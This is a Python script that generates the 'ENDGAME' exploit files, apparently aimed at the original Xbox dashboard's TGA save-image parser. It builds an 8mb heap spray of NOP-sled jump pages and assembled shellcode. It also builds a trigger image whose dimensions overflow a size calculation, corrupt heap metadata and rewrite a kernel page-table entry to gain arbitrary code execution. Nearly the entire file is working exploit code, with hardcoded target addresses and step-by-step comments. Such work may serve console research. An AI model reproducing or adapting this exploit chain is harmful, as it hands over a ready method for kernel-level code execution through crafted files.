import os
import sys
import ctypes
import struct
import subprocess

try:
    import sim5960
    SIM_ENABLED = True
except ImportError:
    SIM_ENABLED = False

#------------------------------------------------------------------------------
# Util
#------------------------------------------------------------------------------

PAGE_SIZE = 0x1000
PTE_REGION = 0xc0000000

def pte_address(address):
    """
    Return the virtual address of the PTE that maps the given address.

    The page number (address >> 12) indexes an array of 4-byte entries that
    starts at PTE_REGION. Any offset within the page is discarded, so every
    address inside a page resolves to the same, 4-byte aligned, PTE address.
    """
    page_number = address >> 12
    return PTE_REGION | (page_number << 2)

def p32(value):
    """
    Pack an unsigned 32-bit integer into 4 little-endian bytes.

    The byte order is pinned explicitly so the generated files do not depend
    on the endianness of the machine running this script.
    """
    return struct.pack("<I", value)

def p16(value):
    """
    Pack an unsigned 16-bit integer into 2 little-endian bytes.

    The byte order is pinned explicitly so the generated files do not depend
    on the endianness of the machine running this script.
    """
    return struct.pack("<H", value)

#------------------------------------------------------------------------------
# Exploit
#------------------------------------------------------------------------------

# resolve the script directory to an absolute path so that the assembler and
# output locations do not depend on how (or from where) the script is launched
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
NASM_PATH = os.path.join(BASE_PATH, "nasm.exe")
ENDGAME_PATH = os.path.join(BASE_PATH, "ENDGAME")

#
# SPRAY_BASE represents the approximate memory address of where we expect our
# 8mb helper buffer to get decompressed and swizzled into memory.
#
# this buffer consists of two components of equal size that the exploit
# depends on to obtain arbitrary code execution. half is made up of 'jump
# pages' described later and the other half is shellcode pages.
#
# the *_MID variables should point approximately half way into each of the
# two regions. this allows for +/- 2mb of wiggle room based on how memory
# layout may drift a bit based on kernel, dash, or runtime discrepancies.
#
# the base address we hardcode was selected after scanning and dumping the
# exact address from the exploit running against several kernel and dash
# combinations. it should also be somewhat resilient to some amount of
# auxiliary 'navigation' around the dash prior to triggering ENDGAME.
#

# expected (approximate) address of the start of the 8mb helper buffer
SPRAY_BASE        = 0xF271B000
# midpoint of the first 4mb of the buffer (the jump pages)
SPRAY_JUMP_MID    = SPRAY_BASE + 0x200000
# midpoint of the second 4mb of the buffer (the shellcode pages)
SPRAY_PAYLOAD_MID = SPRAY_BASE + 0x600000

#
# these two addresses represent the pages that we hope to 'sinkhole' by way of
# PTE corruption. by manipulating their underlying PTEs, we are able to make
# these point at entirely different pages in memory.
#
# the kernel page was hand selected based on reviewing the commonality between
# retail kernels and basic runtime testing. the second PTE we corrupt is
# mostly arbitrary but must be under the code selector limit (end of kernel)
#

# virtual addresses of the two pages whose PTEs get rewritten
TARGET_KERN_PAGE = 0x80022000
TARGET_XBEH_PAGE = 0x11000

# addresses of the PTEs describing the pages above: the trigger's write4 hits
# TARGET_KERN_PTE, and the jump payload then rewrites TARGET_XBEH_PTE
TARGET_KERN_PTE = pte_address(TARGET_KERN_PAGE) # 0xc0200088
TARGET_XBEH_PTE = pte_address(TARGET_XBEH_PAGE) # 0xc0000044

def compile_shellcode(shellcode_filepath, debug=False):
    """
    Assemble the shellcode at the given path with NASM and return its bytes.

    shellcode_filepath must name a '.asm' source file. NASM is invoked without
    an explicit output path and the assembled binary is read back from the
    source path with its extension stripped. When debug is set, the DEBUG
    symbol is defined for the assembler (-dDEBUG).

    Raises ValueError if the path does not end in '.asm'. If NASM returns a
    non-zero status, its stderr is printed and the script exits with status 1.
    """
    # validated with a real exception (not an assert) so the check survives -O;
    # without it the source file itself would be read back as 'shellcode'
    if not shellcode_filepath.endswith(".asm"):
        raise ValueError(f"Expected a .asm source file, got {shellcode_filepath!r}")

    # Run nasm.exe and capture the output and errors
    command = [NASM_PATH]
    if debug:
        command.append("-dDEBUG")
    command.append(shellcode_filepath)

    print("[*] Assembling shellcode... ", end="")
    result = subprocess.run(command, capture_output=True)

    # the command failed, print the error and exit the script
    if result.returncode != 0:
        print("[-] Failed to compile shellcode...")
        print(result.stderr.decode(errors="replace"))
        sys.exit(1)

    output = result.stdout.decode(errors="replace")
    if output.strip():
        print(output)

    print("done")

    # read the compiled shellcode from file and return it
    shellcode_bin_filepath, _ = os.path.splitext(shellcode_filepath)
    with open(shellcode_bin_filepath, "rb") as f:
        return f.read()

def make_helper(compress, debug):
    """
    Generate the ENDGAME helper files (effectively a heap spray).

    Builds an 8mb buffer made of 4mb of jump pages followed by 4mb of
    shellcode pages, un-swizzles it, RLE-compresses it when compress is set,
    wraps it in a TGA header and writes it out as the helper SaveImage (plus
    its TitleMeta) under ENDGAME/helper/. debug is forwarded to
    compile_shellcode().

    Raises ValueError if the assembled shellcode is larger than one page, and
    RuntimeError if the optional sim5960 check rejects the generated TGA.
    """
    PTE_VALUE  = SPRAY_PAYLOAD_MID & 0xFFFFF000
    PTE_VALUE |= 0x63 # (Accessed | Dirty | Valid | Writable)

    #
    # the jump (page) payload should be as small as possible (byte-wise) in an
    # effort to minimize the chance that naturally occurring calls into the
    # kernel (within this page) land on anything but one of our NOP's
    #
    # ideally we want to setup a safer region of memory and get off this page
    # as fast as possible. we do this by corrupting a second PTE that should
    # be within the code selector limit (thus, executable) and unused
    #

    jump_payload = b""

    # corrupt XBE header PTE
    jump_payload += b"\xB8" + p32(TARGET_XBEH_PTE)    # mov    eax, TARGET_XBEH_PTE
    jump_payload += b"\xC7\x00" + p32(PTE_VALUE)      # mov    DWORD PTR [eax], PTE_VALUE

    # jump to shellcode
    jump_payload += b"\x68" + p32(TARGET_XBEH_PAGE)   # push  target
    jump_payload += b"\x0F\x01\x3C\x24"               # invlpg [esp]
    jump_payload += b"\xC3"                           # ret

    #
    # Construct the full jump page + payload. a specific kernel .text PTE will
    # be corrupted to point at one of these precisely aligned jump pages.
    #

    jump_page  = b"\x90" * PAGE_SIZE
    jump_page += jump_payload

    # ensure the jump payload is aligned to the end of the jump page
    jump_page = jump_page[-PAGE_SIZE:]
    assert len(jump_page) == PAGE_SIZE

    #
    # because of the nature of heap unlink, a 4 byte value will get written
    # into one of our jump pages, specifically at the memory address:
    #
    #     PTE_VALUE  = ADDR_TRAMPOLINE & 0xFFFFF000
    #     PTE_VALUE |= 0x61
    #     PTE_VALUE += 0x4
    #     ...
    #     *PTE_VALUE = 0xYYYYYYYY
    #
    # i.e. at offset 0x65 of that page. we insert a 0xB8 byte at offset 0x64,
    # directly in front of the written value, creating a simple but safe
    # no-op 'mov eax, 0xYYYYYYYY' instruction within the page's NOP-sled for
    # the off chance we land within the anomalous page
    #

    jump_page = bytearray(jump_page)
    jump_page[0x64] = 0xB8

    # replicate the completed single page across a 4mb block of memory
    jump_block = jump_page * 0x400
    assert len(jump_block) == 0x400000

    #
    # the shellcode page represents the phase of ENDGAME which equates to
    # fully unconstrained execution.
    #
    # in the current exploit structure, the shellcode should be less than
    # 4096 bytes. this is ample for doing cleanup / repair of the memory
    # space or further bootstrapping.
    #
    # the following logic will compile ENDGAME's shellcode with NASM and
    # return the resulting bytes.
    #

    shellcode_filepath = os.path.join(BASE_PATH, "shellcode.asm")
    shellcode = compile_shellcode(shellcode_filepath, debug)

    # the page-sized slice below keeps only the *last* PAGE_SIZE bytes, so an
    # oversized shellcode would silently lose its beginning -- refuse it here
    if len(shellcode) > PAGE_SIZE:
        raise ValueError(
            f"Shellcode is 0x{len(shellcode):X} bytes, "
            f"but must fit within a single 0x{PAGE_SIZE:X} byte page"
        )

    #
    # prefix the compiled shellcode (which *must* be position independent)
    # with NOP's to construct a full page.
    #

    shellcode_page  = b"\x90" * PAGE_SIZE
    shellcode_page += shellcode

    # ensure the shellcode payload is aligned to the end of the page
    shellcode_page = shellcode_page[-PAGE_SIZE:]
    assert len(shellcode_page) == PAGE_SIZE

    # replicate the completed single page across a 4mb block of memory
    shellcode_block = shellcode_page * 0x400
    assert len(shellcode_block) == 0x400000

    #
    # construct the full helper blob. this represents exactly what we hope to
    # see in memory once our texture has been fully decompressed and swizzled
    #
    # when debugging ENDGAME or researching this exploit, you can locate this
    # buffer in memory using the following WinDbg command:
    #
    #   kd> s F0000000 L08000000 41 51 61 71
    #

    full  = b""
    full += b"\x41\x51\x61\x71" # marker DWORD for debug / mem searching
    full += jump_block[4:]      # 4mb of jump pages (minus the marker DWORD)
    full += shellcode_block     # 4mb of shellcode pages
    assert len(full) == (0x800000), f"Actual len 0x{len(full):X}"

    #
    # when being processed and loaded by the dashboard, our helper blob will
    # get SWIZZLED (as it is technically a d3d texture)... so we have to
    # preemptively UN-SWIZZLE it here.
    #
    # It's an 0x400 x 0x800 x 4 texture (so, 8mb).
    #

    print("[*] Un-swizzling payload... ", end="")
    unswiz_data = unswizzle32(full, 0x400, 0x800)
    print("done")

    #
    # the TGA format allows for run-length encoding of its data, so for fun
    # we actually compress our un-swizzled buffer to reduce its physical size
    # by over 10x (8mb --> 750kb) -- this ensures it should fit on any MU.
    #

    if compress:
        print("[*] Compressing payload... ", end="")
        final_data = rle_compress(unswiz_data, 0x400)
        print("done")
    else:
        final_data = unswiz_data

    #
    # for the purpose of this helper buffer/texture, we don't need to do
    # anything buggy. simply create a TGA of the proper dimensions, with
    # simple "top to bottom" and "left to right" properties
    #

    tga_data = make_tga(0x400, 0x800, 4, final_data, 0x28, compress)

    # optional sanity check: run the generated TGA through the simulator
    if SIM_ENABLED:
        loader = sim5960.LoadTGA()
        status, _decomp_data, parsed = loader.run(tga_data)
        print(f"[*] Valid? {status == 0}, data left over... 0x{parsed:X}")
        if status:
            print(f"[-] FAIL: {status:08X}")
            raise RuntimeError(f"sim5960 rejected the helper TGA (status {status:08X})")

    #
    # write the exploit "helper" files to disk. note that this SaveImage must
    # belong to a game title of alphabetical priority higher than the "trigger"
    # files. this ensures the dash maps our helper into memory first.
    #

    print("[*] Saving helper files... ", end="")

    spray_dir = os.path.join(ENDGAME_PATH, "helper", "0")
    os.makedirs(spray_dir, exist_ok=True)

    # TitleMeta.xbx lives one level above the save directory: BOM + UTF-16LE
    with open(os.path.join(spray_dir, "..", "TitleMeta.xbx"), "wb") as f:
        f.write(b"\xFF\xFE" + "TitleName=HELPER\r\n".encode("utf-16-le"))

    with open(os.path.join(spray_dir, "SaveImage.xbx"), "wb") as f:
        f.write(tga_data)

    # all done
    print("done")

def make_trigger():
    """
    Generate the ENDGAME trigger files.

    Builds a 32-byte payload (16 bytes of replacement heap metadata followed
    by a 16-byte fake chunk carrying the write4 value/address), prefixes it
    with a TGA header whose dimensions overflow a 32-bit size computation, and
    writes the result out as the trigger SaveImage (plus its TitleMeta) under
    ENDGAME/trigger/.
    """
    PTE_VALUE  = SPRAY_JUMP_MID & 0xFFFFF000
    PTE_VALUE |= 0x61 # (Accessed | Dirty | Valid)

    #
    # ENDGAME abuses an integer overflow in the allocation and processing of
    # TGA (image) files, enabling several powerful heap primitives.
    #
    # this is combined with TGA's 'bottom to top' image flag to perform a
    # 16-byte heap underflow, precisely corrupting the chunk's heap metadata
    # to setup a pretty traditional unlink-style write4 primitive.
    #
    # to make ENDGAME kernel and dash agnostic, it precisely targets the PTE
    # for a kernel .text page (kudos to mborgerson for the inspiration) as a
    # generic means of obtaining code execution from a single arbitrary write.
    #

    payload  = b""

    # this block overwrites the heap metadata (the 16 byte underflow); the
    # offsets are relative to the start of the heap allocation
    payload += p16(0x0001)          # -0x10 - Size
    payload += p16(0x0000)          # -0x0E - Previous size
    payload += b"\x00"              # -0x0C - Segment index
    payload += b"\x00"              # -0x0B - Flags
    payload += b"\x00"              # -0x0A - Index
    payload += b"\x00"              # -0x09 - Mask
    payload += p32(0x44444444)      # -0x08
    payload += p32(0x45454545)      # -0x04

    # this block will be at the start of our heap allocation (a fake chunk)
    payload += p16(0x1000)          # +0x00 - Size
    payload += p16(0x4343)          # +0x02 - Previous size
    payload += b"\x00"              # +0x04 - Segment index
    payload += b"\x00"              # +0x05 - Flags
    payload += b"\x00"              # +0x06 - Index
    payload += b"\x00"              # +0x07 - Mask
    payload += p32(PTE_VALUE)       # +0x08 - ENDGAME write value
    payload += p32(TARGET_KERN_PTE) # +0x0C - ENDGAME write address

    #
    # trigger info
    #
    #  - tga.width = 0x8002
    #  - tga.height = 0xFFFD
    #  - tga.img_depth = 2 (bytes, or 16bits)
    #  - tga.img_descriptor = 8 (bottom to top, left to right)
    #
    # (0x8002 * 0xFFFD * 2) = 0x10000FFF4
    #
    # NOTE(review): with these dimensions the last row of the image starts at
    # (0xFFFD - 1) * 0x8002 * 2 = 0xFFFFFFF0 (mod 2^32), i.e. 16 bytes before
    # the buffer, which matches the 16-byte underflow described above --
    # presumably this is why width/height must be passed in this order.
    #
    # NOTE: since we do not provide a sufficient amount of data to load a
    # complete image, the dash's TGA parsing logic fails and will immediately
    # free our corrupted chunk setting the full exploit into motion
    #

    tga_data = make_tga(0x8002, 0xFFFD, 2, payload, 8, False)

    #
    # write the exploit "trigger" files to disk. note that this SaveImage must
    # belong to a game title of alphabetical priority lower than the "helper"
    # files. this ensures the dash triggers the exploit at the correct time
    #

    print("[*] Saving trigger files... ", end="")

    trigger_dir = os.path.join(ENDGAME_PATH, "trigger", "1")
    os.makedirs(trigger_dir, exist_ok=True)

    # TitleMeta.xbx lives one level above the save directory: BOM + UTF-16LE
    with open(os.path.join(trigger_dir, "..", "TitleMeta.xbx"), "wb") as f:
        f.write(b"\xFF\xFE" + "TitleName=TRIGGER\r\n".encode("utf-16-le"))

    with open(os.path.join(trigger_dir, "SaveImage.xbx"), "wb") as f:
        f.write(tga_data)

    # all done
    print("done")
    return

#------------------------------------------------------------------------------
# DirectX (special thanks to xbox7887)
#------------------------------------------------------------------------------

def generate_swizzle_masks(width, height):
    """
    Build the X and Y bit masks of a swizzled layout for the given dimensions.

    Bits of the swizzled offset are handed out from the least significant bit
    upwards, alternating X then Y for as long as each dimension still needs
    more bits; once one dimension is exhausted, the other takes every
    remaining bit. Both dimensions must be powers of two.

    Returns a (mask_x, mask_y) tuple.
    """
    assert (width > 0 and (width & (width - 1)) == 0), "Width must be a power of 2"
    assert (height > 0 and (height & (height - 1)) == 0), "Height must be a power of 2"

    mask_x = mask_y = 0
    next_bit = 1    # next unassigned bit of the swizzled offset
    span = 1        # coordinate range covered by the bits assigned so far

    while span < width or span < height:
        if span < width:
            mask_x |= next_bit
            next_bit <<= 1
        if span < height:
            mask_y |= next_bit
            next_bit <<= 1
        span <<= 1

    return mask_x, mask_y

def fill_swizzle_pattern(pattern, value):
    """
    Scatter the low bits of value into the bit positions set in pattern.

    Bit 0 of value is placed at the lowest set bit of pattern, bit 1 at the
    next set bit, and so on; the combined result is returned.

    Raises ValueError if value is negative or needs more bits than pattern
    has set, rather than looping forever on such input.
    """
    if value < 0:
        raise ValueError("value must be non-negative")

    result = 0
    bit = 1
    while value != 0:
        # no set bits remain in the pattern, yet value still has bits to place
        if bit > pattern:
            raise ValueError("value does not fit in the swizzle pattern")
        if pattern & bit:
            if value & 1:
                result |= bit
            value >>= 1
        bit <<= 1
    return result

def unswizzle32(data, width, height):
    """
    Convert a swizzled buffer of 32-bit pixels to linear (row-major) format.

    For every (x, y) the 4-byte pixel is read from its swizzled offset in data
    and written at the linear offset (y * width + x) * 4 of the result. width
    and height must be powers of two (checked by generate_swizzle_masks).

    Returns a new bytes object of len(data) bytes. Raises ValueError if data
    holds fewer than width * height pixels.
    """
    mask_x, mask_y = generate_swizzle_masks(width, height)

    # a short source would yield short slices below, and assigning those into
    # the bytearray would silently shrink the output
    required = width * height * 4
    if len(data) < required:
        raise ValueError(
            f"Need 0x{required:X} bytes for a {width}x{height} image, got 0x{len(data):X}"
        )

    # the X contribution to the swizzled offset is the same for every row, so
    # compute it once instead of once per pixel
    src_x_offsets = [fill_swizzle_pattern(mask_x, x) * 4 for x in range(width)]

    dst_buf = bytearray(len(data))
    dst_offset = 0
    for y in range(height):
        src_y_offset = fill_swizzle_pattern(mask_y, y) * 4
        for src_x_offset in src_x_offsets:
            src_offset = src_y_offset + src_x_offset
            dst_buf[dst_offset:dst_offset+4] = data[src_offset:src_offset+4]
            dst_offset += 4
    return bytes(dst_buf)

#------------------------------------------------------------------------------
# Truevision TGA
#------------------------------------------------------------------------------

class TGAHeader(ctypes.LittleEndianStructure):
    """
    The fixed 18-byte header found at the start of a Truevision TGA file.

    The structure is byte-packed and explicitly little-endian, so bytes(header)
    is the same on any host. Single-byte fields are unsigned so that values of
    0x80 and above read back (and print) as written.
    """
    _pack_ = 1
    _fields_ = [
        ("id_len", ctypes.c_ubyte),
        ("color_map_type", ctypes.c_ubyte),
        ("img_type", ctypes.c_ubyte),
        ("color_map_ofs", ctypes.c_ushort),
        ("num_color_map", ctypes.c_ushort),
        ("color_map_depth", ctypes.c_ubyte),
        ("x_offset", ctypes.c_ushort),
        ("y_offset", ctypes.c_ushort),
        ("width", ctypes.c_ushort),
        ("height", ctypes.c_ushort),
        ("img_depth", ctypes.c_ubyte),
        ("img_descriptor", ctypes.c_ubyte)
    ]

    @property
    def top_to_bottom(self):
        """True when descriptor bit 0x20 is set (rows stored top to bottom)."""
        return (self.img_descriptor & 0x20) == 0x20

    @property
    def left_to_right(self):
        """True when descriptor bit 0x10 is clear (pixels stored left to right)."""
        return (self.img_descriptor & 0x10) != 0x10

    @property
    def compressed(self):
        """True when image type bit 0x08 is set (run-length encoded data)."""
        return bool(self.img_type & 0x08)

    def __str__(self):
        """
        Pretty-print the TGAHeader.
        """
        lines = ["TGAHeader - "]

        for field_name, _ in self._fields_:
            value = getattr(self, field_name)
            line = f"{field_name.rjust(18, ' ')}: 0x{value:02X}"
            lines.append(line)

            # annotate the two bit-field style members with their decoded flags
            if field_name == "img_type":
                lines.append(f"         |--- compressed: {self.compressed}")

            if field_name == "img_descriptor":
                lines.append(f"   |- top_to_bottom: {self.top_to_bottom}")
                lines.append(f"   |- left_to_right: {self.left_to_right}")

        return "\n".join(lines)

def make_tga(width, height, depth=4, data=b"", descriptor=8, rle=True):
    """
    Build a TGA file image: a populated header followed by the given data.

    width and height must each be in the range 1..0xFFFF and depth (in bytes
    per pixel) in the range 1..4, otherwise ValueError is raised. descriptor
    is stored as the image descriptor byte, and rle selects whether the RLE
    bit (bit 3) of the image type is set. data is appended untouched.
    """
    header = TGAHeader()

    # base image type 2, with bit 3 flagging run-length encoded pixel data
    header.img_type = 2 | (int(rle) << 3)

    # both dimensions have to fit the header's 16-bit fields
    if not (0 < width < 0x10000):
        raise ValueError("Invalid width")
    if not (0 < height < 0x10000):
        raise ValueError("Invalid height")
    header.width, header.height = width, height

    if not (0 < depth < 5):
        raise ValueError("Invalid depth")

    # the header stores the pixel depth in bits rather than bytes
    header.img_depth = depth * 8
    header.img_descriptor = descriptor

    return bytes(header) + data

def rle_compress(data, width):
    """
    Run-length encode (compress) the given data for a TGA image.

    data is treated as a sequence of 4-byte pixels. width is the length, in
    bytes (not pixels), of the chunks that data is split into; a packet never
    extends across a chunk boundary. Each packet is one header byte followed
    by one pixel: 0x00 for a single literal pixel, or 0x80 | (n - 1) for a
    pixel repeated n times (n <= 128).

    A final chunk shorter than width is encoded up to the end of data only.
    """
    depth = 4
    output = bytearray()
    total = len(data)

    for row_start in range(0, total, width):
        # clamp the last chunk so nothing is read (or emitted) past the data
        row_end = min(row_start + width, total)
        offset = row_start
        while offset < row_end:
            pattern = data[offset:offset+depth]
            offset += depth
            count = 0

            # extend the run while the following pixels repeat (max 127 extra)
            while offset < row_end and count < 127 and data[offset:offset+depth] == pattern:
                count += 1
                offset += depth

            output.append(0x80 | count if count else 0)
            output += pattern

    return bytes(output)

#------------------------------------------------------------------------------
# Main
#------------------------------------------------------------------------------

def main(argc, argv):
    """
    Script entry point: build the helper and trigger files.

    A debug build is selected when the first command line argument is
    '-d' or '--debug'.
    """

    # only the first argument is inspected, anything else is ignored
    debug = False
    if argc > 1:
        debug = argv[1] in ("-d", "--debug")

    # generate the ENDGAME exploit files
    build_tag = " (debug)" if debug else ""
    print(f"[*] Generating ENDGAME v1.0{build_tag} exploit files -- by Markus Gaasedelen & shutterbug2000")
    make_helper(True, debug)
    make_trigger()
    print("[+] Success, exploit files available in ENDGAME/ directory")

# only generate the exploit files when executed as a script (not on import)
if __name__ == "__main__":
    main(len(sys.argv), sys.argv)